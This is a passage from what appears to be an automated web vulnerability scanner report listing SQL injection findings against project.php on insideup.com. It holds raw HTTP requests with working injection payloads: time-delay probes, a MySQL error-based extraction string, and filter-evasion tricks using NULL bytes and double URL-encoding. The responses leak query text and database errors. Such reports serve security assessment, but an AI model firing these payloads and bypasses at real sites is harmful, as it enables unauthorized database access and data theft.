GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email%00''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=auj3frr0jt73ukricb4ad3sh47; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.369. http://www.insideup.com/ppc/leadflow/hins00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.370. http://www.insideup.com/ppc/leadflow/hins00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name%00'&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qctcj0a152pjob7p70nk4omht7; path=/
Content-Length: 7326
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name.'&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name%00''&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q0msgr7v0la2s91som68sjs086; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.371. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc%2527&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7254
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc%27&address=Address&attributeId_342_g=2017__Accounting/Finance&att' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc%2527%2527&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.372. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7r3ieaak6uiung239p0f4h2a16; path=/
Content-Length: 4094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=97pha4kj7pequ350n24jf7eog6; path=/
Content-Length: 3917
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.373. http://www.insideup.com/ppc/leadflow/hins00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.374. http://www.insideup.com/ppc/leadflow/hins00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

